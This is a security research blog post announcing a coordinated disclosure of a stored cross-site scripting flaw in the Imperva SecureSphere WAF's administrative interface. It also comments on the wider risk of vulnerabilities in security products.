Imperva SecureSphere XSS and the nature of security-product vulnerabilitiesBy: Counter Threat Unit Research Team
Earlier today, Imperva publicly announced  a vulnerability  in their flagship SecureSphere WAF (Web Application Firewall). This issue was discovered by Sean Talbot of Dell SecureWorks and disclosed in a coordinated fashion with Imperva. We thank Imperva for their timely confirmation of our findings and the rapid deployment of patches to address the issue. Affected users are advised to patch their systems as soon as feasible. Details of the vulnerability and information regarding patches are available in our SWRX-2011-001 advisory  and also in Imperva's announcement.
To summarize, an Imperva SecureSphere WAF confronted with malicious traffic will log events, recording details of the attack to its internal database. In some cases, the contents of these events are not properly sanitized on display, leading to the possibility of escalating an attempted Cross-Site Scripting (XSS) attack on a protected web application into a live persistent Cross-Site Scripting attack against the SecureSphere administrative GUI. An attacker may leverage this attack to gain administrative access to the SecureSphere system, allowing them to create accounts, view or delete sensitive logs, or completely disable WAF protections.
While the thought of a security system introducing vulnerabilities into the network it's meant to protect is concerning, Imperva is far from alone in facing this issue. The industry-wide trend is to perform deeper and more complex inspection of traffic with intermediate devices, be they WAF, IDS/IPS (Intrusion Detection and Prevention System), DPI (Deep Packet Inspection), firewalls, and so on. This deeper level of inspection brings with it the increased likelihood of flaws leading to compromise of these systems. While most of the research into vulnerabilities of security devices and applications focuses on the means of bypassing their protections, there has been research into directly leveraging their flaws. At Black Hat USA 2010, I had the honor of co-presenting  with Ben Feinstein and Dan King on similar issues affecting Cisco ASA and McAfee's Network Security Manager. Others in the security industry, including Dan Kaminsky , have noted similar attacks against Deep Packet Inspection (DPI) and Application Layer Gateway (ALG) devices. NSS Labs' recent disclosure of the TCP Split Handshake attack  further demonstrates the problem of intermediate inspection logic gone awry.
This latest flaw in SecureSphere further underscores the need to evaluate the security of security systems. Any reasonably complex system is likely to have flaws, and security systems are no different. No system is perfect, but the trusted nature of security systems warrants a very high level of scrutiny and sensitivity. Imperva should be applauded for their response, but this vulnerability highlights the difficult issues that arise when attempting to protect a complex system by introducing still more complexity.
| - http://www.imperva.com/resources/adc/adc_advisories_response_secureworks.html|
| - https://www.secureworks.com/research/swrx-2011-001|
| - https://www.blackhat.com/html/bh-us-10/bh-us-10-archives.html#Feinstein|
| - http://s3.amazonaws.com/dmk/Staring Into The Abyss.pdf|
| - http://www.nsslabs.com/research/analysis-briefs/network-firewall-remediation-for-tcp-split-handshake.html|